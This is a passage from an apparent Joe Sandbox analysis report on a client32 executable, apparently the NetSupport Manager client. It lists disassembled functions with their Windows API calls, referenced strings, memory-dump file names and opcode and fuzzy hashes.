                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 11001016
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001011
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitKillLastMessageProcessTimerwsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 2229609774-2830328467
                                                                                                                                                                                • Opcode ID: d4807327fe4b082724ef47ceaeb465ac3c6158873c83b32b6c6d66c5ab4a80eb
                                                                                                                                                                                • Instruction ID: 3936fa5a6487bcfb2675ba24450813cfe8c9b001fa673c8171921283ac7246b0
                                                                                                                                                                                • Opcode Fuzzy Hash: d4807327fe4b082724ef47ceaeb465ac3c6158873c83b32b6c6d66c5ab4a80eb
                                                                                                                                                                                • Instruction Fuzzy Hash: C8D02BB66003287BD320D681DC41ED6F3CCD708354F004036F51956100D5B0E840C390
                                                                                                                                                                                Function 1100D5E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersion.KERNEL32(1100D85E,?,00000000,?,1100CB7A,?), ref: 1100D5E9
                                                                                                                                                                                • LoadLibraryA.KERNEL32(AudioCapture.dll,?,1100CB7A,?), ref: 1100D5F8
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoadVersion
                                                                                                                                                                                • String ID: AudioCapture.dll
                                                                                                                                                                                • API String ID: 3209957514-2642820777
                                                                                                                                                                                • Opcode ID: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                                                                                                                • Instruction ID: 371e9eeab2a9ec736c68531bc0ba6d51211132de28c640fd63a90ee5c1cea0f0
                                                                                                                                                                                • Opcode Fuzzy Hash: 047088f675874291a047ed730703cd504129d7fac9f2a2c6fa5c74864475883a
                                                                                                                                                                                • Instruction Fuzzy Hash: BEE0173CA411678BFB028BF98C4839D7AE0A70468DFC400B0E83AC2948FB698440CF20
                                                                                                                                                                                Function 11113160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindWindowA.USER32(MSOfficeWClass,00000000), ref: 1111316A
                                                                                                                                                                                • SendMessageA.USER32(00000000,00000414,?,00000000), ref: 11113180
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FindMessageSendWindow
                                                                                                                                                                                • String ID: MSOfficeWClass
                                                                                                                                                                                • API String ID: 1741975844-970895155
                                                                                                                                                                                • Opcode ID: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                                                                                                • Instruction ID: 2732a125022ff7c0da3ed2a920369edb2684b905192db69b753ec1fccd0d92f1
                                                                                                                                                                                • Opcode Fuzzy Hash: 677dd944a9b37f0d248d1dc2443b6c9e227fd66e90a00cd9b08d5884c152e529
                                                                                                                                                                                • Instruction Fuzzy Hash: FAD0127078430C77E6141AE1DE4EF96FB6C9744B65F004028F7159E4C5EAB4B44087BC
                                                                                                                                                                                Function 1115F310 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 15COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • DestroyWindow.USER32(?,000000A8,110AC717), ref: 1115F338
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DestroyErrorExitLastMessageProcessWindowwsprintf
                                                                                                                                                                                • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                                                                                                                • API String ID: 1417657345-2201682149
                                                                                                                                                                                • Opcode ID: e62a194f5df93af7657d178d80f6b178433b3b4350136e11f905c0682c2be5d2
                                                                                                                                                                                • Instruction ID: 7db3f745f54082ef040700b2ebbb9d394f22af4f20fbf84319d784bae123f924
                                                                                                                                                                                • Opcode Fuzzy Hash: e62a194f5df93af7657d178d80f6b178433b3b4350136e11f905c0682c2be5d2
                                                                                                                                                                                • Instruction Fuzzy Hash: 9CD0A770A503359BD7608A56EC86BC6F2D4AB1221CF044479E0A362551E270F584C681
                                                                                                                                                                                Function 1101D390 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetMenu.USER32(00000000), ref: 1101D3B4
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_hWnd, xrefs: 1101D3A3
                                                                                                                                                                                • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101D39E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastMenuMessageProcesswsprintf
                                                                                                                                                                                • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                • API String ID: 1590435379-2830328467
                                                                                                                                                                                • Opcode ID: f627e32231bd488a72c8df29b3d34e0c33ca21910114508e24ae69c3e9bbbc71
                                                                                                                                                                                • Instruction ID: 75955eb5d3bdaa86fb34179760e08c08bc775c18ff6c0b8e66661a9f5e9df206
                                                                                                                                                                                • Opcode Fuzzy Hash: f627e32231bd488a72c8df29b3d34e0c33ca21910114508e24ae69c3e9bbbc71
                                                                                                                                                                                • Instruction Fuzzy Hash: 18D022B1D00235ABC700D662EC4ABC9F2C49B09318F004076F03666004E2B4E4808384
                                                                                                                                                                                Function 1115B910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MenuProp
                                                                                                                                                                                • String ID: OldMenu
                                                                                                                                                                                • API String ID: 601939786-3235417843
                                                                                                                                                                                • Opcode ID: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                                                                                                                                • Instruction ID: 00d1d82ffe912eb1f0033c226aa13db8fbf5a9b0d38ca05e3ef3a03686f26a50
                                                                                                                                                                                • Opcode Fuzzy Hash: b2ae159b91161bc5121d418d4eba0eb432953fd9fc1df4eba921856773b07696
                                                                                                                                                                                • Instruction Fuzzy Hash: CBC0123214257DA782016A95DD44DCBFB6DEE0A1557044022F520D2401E721551047E9